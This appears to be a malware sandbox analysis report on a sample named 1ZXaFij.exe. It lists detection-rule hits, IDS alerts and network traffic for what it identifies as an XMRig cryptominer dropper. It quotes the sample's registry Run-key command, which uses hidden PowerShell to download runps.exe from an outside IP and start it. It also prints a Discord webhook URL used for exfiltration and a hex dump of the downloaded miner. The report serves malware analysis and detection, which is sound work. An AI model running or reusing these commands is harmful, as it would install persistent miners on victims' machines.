        Sigma detected: Usage Of Web Request Commands And Cmdlets
        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f, CommandLine: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: "C:\Users\user\Desktop\1ZXaFij.exe", ParentImage: C:\Users\user\Desktop\1ZXaFij.exe, ParentProcessId: 2848, ParentProcessName: 1ZXaFij.exe, ProcessCommandLine: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsUpdate /t REG_SZ /d "powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe" /f, ProcessId: 6912, ProcessName: reg.exe
        Sigma detected: Use Short Name Path in Command Line
        Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES9CAF.tmp" "c:\Users\user\AppData\Local\Temp\5trl00oq\CSC8D43AD1B76AB4ACB9D31FAE12D51980.TMP", CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES9CAF.tmp" "c:\Users\user\AppData\Local\Temp\5trl00oq\CSC8D43AD1B76AB4ACB9D31FAE12D51980.TMP", CommandLine|base64offset|contains: 8c, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5trl00oq\5trl00oq.cmdline", ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentProcessId: 7696, ParentProcessName: csc.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES9CAF.tmp" "c:\Users\user\AppData\Local\Temp\5trl00oq\CSC8D43AD1B76AB4ACB9D31FAE12D51980.TMP", ProcessId: 7728, ProcessName: cvtres.exe
        Sigma detected: Dynamic CSharp Compile Artefact
        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7256, TargetFilename: C:\Users\user\AppData\Local\Temp\5trl00oq\5trl00oq.cmdline
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1", CommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1652, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1", ProcessId: 7256, ProcessName: powershell.exe
        Sigma detected: Windows Processes Suspicious Parent Directory
        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7420, ProcessName: svchost.exe

        Data Obfuscation

        barindex
        Sigma detected: Dot net compiler compiles file from suspicious location
        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5trl00oq\5trl00oq.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5trl00oq\5trl00oq.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7256, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5trl00oq\5trl00oq.cmdline", ProcessId: 7696, ProcessName: csc.exe

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-03-01T16:04:22.801954+010020283713Unknown Traffic192.168.2.749712162.159.138.232443TCP
        2025-03-01T16:04:25.053685+010020283713Unknown Traffic192.168.2.749725162.159.138.232443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-03-01T16:04:57.084630+010028033053Unknown Traffic192.168.2.749917204.79.197.203443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-03-01T16:04:41.499749+010028308981A Network Trojan was detected192.168.2.749820108.128.124.3443TCP
        2025-03-01T16:04:42.451553+010028308981A Network Trojan was detected192.168.2.749826108.128.124.3443TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for dropped file
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeReversingLabs: Detection: 42%
        Multi AV Scanner detection for submitted file
        Source: 1ZXaFij.exeVirustotal: Detection: 55%Perma Link
        Source: 1ZXaFij.exeReversingLabs: Detection: 42%
        Joe Sandbox ML detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

        Bitcoin Miner

        barindex
        Yara detected Xmrig cryptocurrency miner
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: 23.0.explorer.exe.c000ae0000.14.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000017.00000000.1543470099.000000C000C00000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.7:49712 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.7:49725 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.7:49917 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.7:49976 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.7:49988 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.7:49989 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.7:49993 version: TLS 1.2
        Source: Binary string: 2C:\Users\user\AppData\Local\Temp\vk4yczyv.pdbhPA source: powershell.exe, 00000011.00000002.1485108514.00000203A6605000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: ;C:\Users\user\AppData\Local\Temp\5trl00oq\5trl00oq.pdb source: powershell.exe, 0000000B.00000002.1627613856.00000222B8D69000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: 2C:\Users\user\AppData\Local\Temp\vk4yczyv.pdb source: powershell.exe, 00000011.00000002.1485108514.00000203A6605000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: ;C:\Users\user\AppData\Local\Temp\5trl00oq\5trl00oq.pdbhPA source: powershell.exe, 0000000B.00000002.1627613856.00000222B8D69000.00000004.00000800.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400A24B0 FindFirstFileW,FindClose,FindFirstFileW,FindClose,2_2_00000001400A24B0
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400296C0 GetFileAttributesW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,FindClose,2_2_00000001400296C0
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400709C0 GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,GetTickCount,PeekMessageW,GetTickCount,MoveFileW,DeleteFileW,MoveFileW,CopyFileW,GetLastError,FindNextFileW,FindClose,2_2_00000001400709C0
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_0000000140029170 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,FileTimeToSystemTime,2_2_0000000140029170
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_0000000140029520 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,2_2_0000000140029520
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_0000000140028E70 FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,2_2_0000000140028E70
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeFile opened: C:\Users\user\Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeFile opened: C:\Users\user\AppData\Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
        Source: C:\Windows\explorer.exeCode function: 4x nop then dec eax23_2_11F2BD80
        Source: C:\Windows\explorer.exeCode function: 4x nop then dec eax23_2_5833BD80

        Networking

        barindex
        Suricata IDS alerts for network traffic
        Source: Network trafficSuricata IDS: 2830898 - Severity 1 - ETPRO MALWARE Win32/TeleGrab Style IP Check : 192.168.2.7:49826 -> 108.128.124.3:443
        Source: Network trafficSuricata IDS: 2830898 - Severity 1 - ETPRO MALWARE Win32/TeleGrab Style IP Check : 192.168.2.7:49820 -> 108.128.124.3:443
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\explorer.exeNetwork Connect: 45.144.212.77 16000Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 208.95.112.1 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 108.128.124.3 443Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 204.79.197.203 443
        Uses known network protocols on non-standard ports
        Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 16000
        Source: unknownNetwork traffic detected: HTTP traffic on port 16000 -> 49700
        Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 16000
        Source: unknownNetwork traffic detected: HTTP traffic on port 16000 -> 49785
        Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 16000
        Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 16000
        Source: unknownNetwork traffic detected: HTTP traffic on port 16000 -> 49837
        Source: unknownNetwork traffic detected: HTTP traffic on port 16000 -> 49785
        Source: global trafficTCP traffic: 192.168.2.7:49700 -> 45.144.212.77:16000
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKAccept-Ranges: bytesContent-Disposition: attachment; filename*=UTF-8''xmrig.exeContent-Length: 6423040Content-Type: application/octet-streamLast-Modified: Thu, 13 Feb 2025 14:07:02 GMTSet-Cookie: t2kjedsto6t1tmx2hporygybel0ewazl9vn62y7wv23mxwm0n1aia0fiwn3i2tc2sam7k5s0urb02fx948z3bl4nl2h6bm1ib9h4lr4aklbjk8ei4qio6z5gwe45s1j1=c59195a1-8cfb-422b-b31e-ad65abe9773b; Path=/; Domain=45.144.212.77; Expires=Sun, 02 Mar 2025 15:04:34 GMT; Max-Age=86400; HttpOnly; SameSite=LaxDate: Sat, 01 Mar 2025 15:04:34 GMTData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 14 c8 48 b9 50 a9 26 ea 50 a9 26 ea 50 a9 26 ea 1b d1 25 eb 57 a9 26 ea 1b d1 23 eb 9b a9 26 ea 41 2f 25 eb 5a a9 26 ea 41 2f 22 eb 43 a9 26 ea 41 2f 23 eb 31 a9 26 ea 1b d1 22 eb 46 a9 26 ea d3 2f 22 eb 42 a9 26 ea 50 a9 27 ea d0 a8 26 ea 1b d1 27 eb 47 a9 26 ea 1b 2c 22 eb 70 aa 26 ea d3 2f 2f eb 59 a8 26 ea d3 2f 25 eb 53 a9 26 ea d3 2f d9 ea 51 a9 26 ea 50 a9 b1 ea 51 a9 26 ea d3 2f 24 eb 51 a9 26 ea 52 69 63 68 50 a9 26 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 09 00 b3 ea 96 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 2a 00 a4 42 00 00 46 49 00 00 00 00 00 a0 27 3f 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 8c 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 eb 5c 00 dc 00 00 00 00 20 8b 00 c8 59 00 00 00 10 88 00 f0 a9 02 00 00 00 00 00 00 00 00 00 00 80 8b 00 44 b5 00 00 80 39 59 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3b 59 00 28 00 00 00 40 38 59 00 40 01 00 00 00 00 00 00 00 00 00 00 00 c0 42 00 68 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 a3 42 00 00 10 00 00 00 a4 42 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5a 4e 1a 00 00 c0 42 00 00 50 1a 00 00 a8 42 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 dc f2 2a 00 00 10 5d 00 00 08 01 00 00 f8 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 f0 a9 02 00 00 10 88 00 00 aa 02 Data Ascii: MZ@(!L!This program cannot be run in DOS mode.$HP&P&P&%W&#&A/%Z&A/"C&A/#1&"F&/"B&P'&'G&,"p&//Y&/%S&/Q&PQ&/$Q&RichP&PEdg"*BFI'?
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKAccept-Ranges: bytesContent-Disposition: attachment; filename*=UTF-8''xmrig.exeContent-Length: 6423040Content-Type: application/octet-streamLast-Modified: Thu, 13 Feb 2025 14:07:02 GMTSet-Cookie: t2kjedsto6t1tmx2hporygybel0ewazl9vn62y7wv23mxwm0n1aia0fiwn3i2tc2sam7k5s0urb02fx948z3bl4nl2h6bm1ib9h4lr4aklbjk8ei4qio6z5gwe45s1j1=a567a7b2-c332-408c-a558-3e60dc9d0ee4; Path=/; Domain=45.144.212.77; Expires=Sun, 02 Mar 2025 15:04:43 GMT; Max-Age=86400; HttpOnly; SameSite=LaxDate: Sat, 01 Mar 2025 15:04:43 GMTData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 14 c8 48 b9 50 a9 26 ea 50 a9 26 ea 50 a9 26 ea 1b d1 25 eb 57 a9 26 ea 1b d1 23 eb 9b a9 26 ea 41 2f 25 eb 5a a9 26 ea 41 2f 22 eb 43 a9 26 ea 41 2f 23 eb 31 a9 26 ea 1b d1 22 eb 46 a9 26 ea d3 2f 22 eb 42 a9 26 ea 50 a9 27 ea d0 a8 26 ea 1b d1 27 eb 47 a9 26 ea 1b 2c 22 eb 70 aa 26 ea d3 2f 2f eb 59 a8 26 ea d3 2f 25 eb 53 a9 26 ea d3 2f d9 ea 51 a9 26 ea 50 a9 b1 ea 51 a9 26 ea d3 2f 24 eb 51 a9 26 ea 52 69 63 68 50 a9 26 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 09 00 b3 ea 96 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 2a 00 a4 42 00 00 46 49 00 00 00 00 00 a0 27 3f 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 8c 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 eb 5c 00 dc 00 00 00 00 20 8b 00 c8 59 00 00 00 10 88 00 f0 a9 02 00 00 00 00 00 00 00 00 00 00 80 8b 00 44 b5 00 00 80 39 59 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3b 59 00 28 00 00 00 40 38 59 00 40 01 00 00 00 00 00 00 00 00 00 00 00 c0 42 00 68 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 a3 42 00 00 10 00 00 00 a4 42 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5a 4e 1a 00 00 c0 42 00 00 50 1a 00 00 a8 42 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 dc f2 2a 00 00 10 5d 00 00 08 01 00 00 f8 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 f0 a9 02 00 00 10 88 00 00 aa 02 Data Ascii: MZ@(!L!This program cannot be run in DOS mode.$HP&P&P&%W&#&A/%Z&A/"C&A/#1&"F&/"B&P'&'G&,"p&//Y&/%S&/Q&PQ&/$Q&RichP&PEdg"*BFI'?
        Source: global trafficHTTP traffic detected: GET /v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=windows-windowsShell-feeds&osLocale=en-GB&CheckEnable=true&activityId=A832951E-6F73-4E67-8618-6335829FCBCB&user=m-87c0d7fd4110479b90e592644fef2efa HTTP/1.1Host: api.msn.com
        Source: global trafficHTTP traffic detected: GET /v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=windows-windowsShell-feeds&osLocale=en-GB&CheckEnable=true&activityId=510BBDB7-3599-436D-820F-2ABDE7F9F873&user=m-e7a31ade3d684c0e97c45c78160337e0 HTTP/1.1Host: api.msn.comCookie: sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=67c32218c58340a7ad67aa086329d79e.RefC=2025-03-01T15:04:56Z; MUIDB=234BCFF39959693B2E03DA51982E6870; _EDGE_V=1; MUID=234BCFF39959693B2E03DA51982E6870
        Source: global trafficHTTP traffic detected: GET /v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=windows-windowsShell-feeds&osLocale=en-GB&CheckEnable=true&activityId=2952DDCC-108A-4E23-AF85-28774DAFF838&user=m-916b169b80db4bcaa1daf96135f22620 HTTP/1.1Host: api.msn.comCookie: sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=67c32218c58340a7ad67aa086329d79e.RefC=2025-03-01T15:04:56Z; MUIDB=234BCFF39959693B2E03DA51982E6870; _EDGE_V=1; MUID=234BCFF39959693B2E03DA51982E6870
        Source: global trafficHTTP traffic detected: GET /v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=windows-windowsShell-feeds&osLocale=en-GB&CheckEnable=true&activityId=2FFE0440-7220-4EB4-8A34-B544478D19A2&user=m-0e31ef8bffd841ec982c5646be013e0e HTTP/1.1Host: api.msn.comCookie: sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=67c32218c58340a7ad67aa086329d79e.RefC=2025-03-01T15:04:56Z; MUIDB=234BCFF39959693B2E03DA51982E6870; _EDGE_V=1; MUID=234BCFF39959693B2E03DA51982E6870
        Source: global trafficHTTP traffic detected: GET /v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=windows-windowsShell-feeds&osLocale=en-GB&CheckEnable=true&activityId=8FE6B6FE-A76C-4FD2-8505-C47EF2E5C176&user=m-8914b0e0329445caa4090e2130a4ca07 HTTP/1.1Host: api.msn.comCookie: sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=67c32218c58340a7ad67aa086329d79e.RefC=2025-03-01T15:04:56Z; MUIDB=234BCFF39959693B2E03DA51982E6870; _EDGE_V=1; MUID=234BCFF39959693B2E03DA51982E6870
        Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
        Source: Joe Sandbox ViewIP Address: 162.159.138.232 162.159.138.232
        Source: Joe Sandbox ViewIP Address: 204.79.197.203 204.79.197.203
        Source: Joe Sandbox ViewIP Address: 204.79.197.203 204.79.197.203
        Source: Joe Sandbox ViewASN Name: HPC-MVM-ASHU HPC-MVM-ASHU
        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownDNS query: name: checkip.amazonaws.com
        Source: unknownDNS query: name: ip-api.com
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49712 -> 162.159.138.232:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49725 -> 162.159.138.232:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49917 -> 204.79.197.203:443
        Source: global trafficHTTP traffic detected: POST /api/webhooks/1336260514443034724/R5xYzcBDAyMG4uc5riHNlZ0uakoX7Mx1w3FVyPDyFzRsqaly5RkRwMMGA9hPd0zvz0yH HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 79Host: discord.com
        Source: global trafficHTTP traffic detected: POST /api/webhooks/1336260514443034724/R5xYzcBDAyMG4uc5riHNlZ0uakoX7Mx1w3FVyPDyFzRsqaly5RkRwMMGA9hPd0zvz0yH HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 79Host: discord.com
        Source: global trafficHTTP traffic detected: GET /setup HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 45.144.212.77:16000
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
        Source: unknownTCP traffic detected without corresponding DNS query: 45.144.212.77
